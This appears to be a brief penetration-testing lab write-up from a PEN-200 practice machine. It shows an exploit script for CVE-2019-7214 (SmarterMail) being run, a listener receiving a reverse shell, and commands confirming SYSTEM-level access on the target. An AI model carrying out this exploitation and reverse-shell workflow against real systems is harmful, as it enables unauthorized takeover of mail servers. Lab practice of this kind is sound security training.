CVE-2019-7214


The target system has SmarterMail up and running and it has been suspected to be vulnerable to CVE-2019-7214

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/algernon]
└─$ python3 CVE-2019-7214.py

Executing the exploit script

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/algernon]
└─$ nnc 4444             
listening on [any] 4444 ...
connect to [192.168.45.192] from (UNKNOWN) [192.168.236.65] 50111
 
PS C:\Windows\system32> whoami
nt authority\system
PS C:\Windows\system32> hostname
algernon
PS C:\Windows\system32> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0:
 
   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 192.168.236.65
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.236.254

Initial Foothold established to the target system as SYSTEM via exploiting CVE-2019-7214 System level compromise